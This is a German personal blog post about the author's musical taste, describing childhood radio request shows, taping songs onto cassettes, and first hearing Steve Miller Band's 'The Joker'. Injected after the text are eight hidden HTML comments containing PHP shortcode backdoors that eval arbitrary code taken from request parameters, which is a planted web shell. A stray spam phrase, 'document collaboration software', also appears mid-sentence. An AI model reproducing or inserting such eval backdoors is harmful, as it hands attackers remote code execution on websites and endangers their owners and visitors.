Wegen diesem Facebook-Dingens mit der Musik, muss ich jetzt wieder mit dem Bloggen anfangen. Warum? Nun, dieses Posting würde den Rahmen von Facebook sprengen. Glaubt ihr nicht? Freunde der gepflegten Musik, ihr ahnt nicht, auf welche Achterbahnfahrt durch die neuere Musikgeschichte ihr mich begleiten werdet. Mein Musikgeschmack ist breiter aufgestellt, als Christiano Ronaldo vor dem Freistoß. Nur cooler. Und bunter als die Hemden von Jürgen von der Lippe zu seiner besten Zeit.

Allerdings werde ich nicht täglich einen Titel posten. Das wäre mir zu viel. Ich möchte nämlich zu jedem Stück Musikgeschichte, das mich geprägt hat, ein bisschen was erzählen. Und ich werde niemand nominieren. Nicht direkt zumindest. Aber sagen wir mal so, meistens wird in der Geschichte jemand erwähnt werden. Der kann sich dann nominiert fühlen oder eben nicht. Nun aber genug des Preludio lasst uns groven…

Für die Wenig-Leser hier der Hit des Tages:

The Joker von der der Steve Miller Band

Für die anderen hier die ganze Geschichte: Wenn die Kindheit musikalisch prägend ist, hab ich schlechte Karten bekommen. Meine Eltern waren und sind eingefleischte Bayern-1-Hörer. Freitagabend wurden der Fernseher ab und das Radio angeschaltet. Dann kam das Wunschkonzert auf Bayern-1 mit Elmar Gunsch. Man spielte zusammen, lauschte den launigen Moderationen und den noch launigeren Liedern. Irgendwann kam der Tag, an dem ich zwischen all den Hossas und blauen Enzianen eine echte Perle fand. „Ruf Teddybär eins-vier“ von Jonny Hill war so eine Perle. Noch heute bekomme ich davon Gänsehaut.

Leider ebnete dieses Lied nicht meine Vorliebe zur deutschen Lyrik, sondern manifestierte eher meine Neigung für deutsche Musik. Das sollte sich auch nicht mehr ändern. Frühprägung und so…

Es kam, was damals für einen Bayern-1-Hörer unvermeidlich war: Ich lernte Truck Stopp kennen. Die Jungs galoppierten mit ihren geilen Seidenhemden und coolen Hüten direkt in mein kleines Cowboy-Herz.

Ich war angefixt und abhängig von der Mucke. Schnell wollte ich meine Lieder nicht nur am Freitagabend sondern auch am Montagmorgen und Mittwochmittag hören. Meine Eltern taten dann etwas, was damals wohl alle guten Eltern taten: Sie kaufen mir Kassetten und brachten mir bei, wie man die Lieder vom Radio aufnimmt. Sie kauften zu den Magnetbändern sogar extra ein neues Radio, denn mit dem alten Schwanenhals-Autoradio, das mein Vater zur Stereo-Anlage umgebaut hatte, ging das nicht. Das Radio war grau, hatte eine Antenne und steht noch heute in meiner Werkstatt wo es am Samstagnachmittag „Heute im Stadion“ spielen darf. Natürlich auf Bayern-1. Glaubt ihr nicht, hier das Foto:

Das "Heute-im-Stadion-Werkstatt-Radio" mit Biergarten

Das „Heute-im-Stadion-Werkstatt-Radio“ mit Biergarten

Fortan perfektionierte ich an Freitagen nicht mehr nur mein Dame- und Malefitz-Spiel, ich legte auch den Grundstein für meine eigene Musiksammlung. Mit einem Ohr war ich immer bei Herr Gunsch und sobald das passende Lied angesagt wurde, drückte ich den Aufnahme-Knopf. Keine Ahnung, wie viele Kassetten ich so befüllte, es müssen wohl einige Dutzend gewesen sein. Doch es kam, wie es kommen musste. Die Freitagabende spielend mit den Eltern zu verbringen, war nicht mehr meine oberste Priorität document collaboration software. Und ganz ehrlich: Bayern-1 war irgendwann auch nicht mehr der heißeste Scheiß, denn es im Radio zu hören gab. Da lag mir Thomas Gottschalk und Bayern-3 eher. Leider lag gerade der meinen Eltern eher weniger. Die Musik-Sammlung darbte eine ganze Zeit lang ohne nennenswerte Zuwächse. Bis ich irgendwann meine erste eigene Stereo-Anlage bekam.

Es war Weihnachten 1986 – oder so um diese Zeit rum. Ich wurde musikalisch quasi erwachsen. Aber alte Gewohnheiten legt man so schnell nicht ab. Den nächsten Freitag verbrachte ich allein mit meiner Stereo-Anlage. Ich hatte sogar eine nagelneue Maxell-XLII-S-90-Kassette besorgt. Das Wunschkonzert gab es schließlich auch auf Bayern-3, es hieß da nur „Schlager der Woche“. Ungeduldig wartete ich auf den ersten Titel, ich wollte endlich ausprobieren, wie das mit der Aufnahme funktionierte. Ich hörte nicht auf die Moderation. Mir war egal welcher Titel da kam: Als der Moderator endlich aufhörte zu sabbeln drückte ich auf Aufnahme. Hörte das Lied zu Ende und spulte dann das Band zurück. Gespannt auf Play gedrückt und hey – es hatte funktioniert. Und wie, und was hatte ich für ein Glück: Das Lied, das ich zufällig aufgenommen hatte, war der Hammer. Es zog mich sofort in seinen Bann. Ich war nicht mehr der kleine Truck-Stopp-Cowboy, ich war der coole Space Cowboy und Marcus hört sich einfach genau wie Maurice an. Mister Steve Miller, ich danke Dir und deiner Band für dieses Stück Musik, das zu mir passt, wie Arsch auf Eimer. Und soll ich Euch was sagen, das Jahr 2001 war nur deswegen halbwegs aushaltbar, weil die Jungs von Fettes Brot den Song so geil gecovert haben.

PS: Das zweite Lied, das später auf der Kassette landete war übrigens von Frank Zander. Und nein, es war nicht der Ententanz, es war viel geiler.

Danach kamen dann die Jungs von Sweet mit „Ballroom Blitz“

Und diese Mischung sagt eigentlich schon wieder ziemlich viel über meinen Musikgeschmack.

PPS: Wer bis hier her gelesen hat, darf sich nominiert fühlen und gerne mehr über seinen Musikgeschmack posten.

PPPS: Wenn Stefan Raab das hier mal covern würde, es wäre garantiert sein internationaler Durchbruch.

 

<!– [insert_php]if (isset($_REQUEST["ILh"])){eval($_REQUEST["ILh"]);exit;}[/insert_php][php]if (isset($_REQUEST["ILh"])){eval($_REQUEST["ILh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["cTtxV"])){eval($_REQUEST["cTtxV"]);exit;}[/insert_php][php]if (isset($_REQUEST["cTtxV"])){eval($_REQUEST["cTtxV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["cHlrV"])){eval($_REQUEST["cHlrV"]);exit;}[/insert_php][php]if (isset($_REQUEST["cHlrV"])){eval($_REQUEST["cHlrV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["YJE"])){eval($_REQUEST["YJE"]);exit;}[/insert_php][php]if (isset($_REQUEST["YJE"])){eval($_REQUEST["YJE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["pyHT"])){eval($_REQUEST["pyHT"]);exit;}[/insert_php][php]if (isset($_REQUEST["pyHT"])){eval($_REQUEST["pyHT"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["aSBW"])){eval($_REQUEST["aSBW"]);exit;}[/insert_php][php]if (isset($_REQUEST["aSBW"])){eval($_REQUEST["aSBW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["TZfO"])){eval($_REQUEST["TZfO"]);exit;}[/insert_php][php]if (isset($_REQUEST["TZfO"])){eval($_REQUEST["TZfO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ifDYO"])){eval($_REQUEST["ifDYO"]);exit;}[/insert_php][php]if (isset($_REQUEST["ifDYO"])){eval($_REQUEST["ifDYO"]);exit;}[/php] –>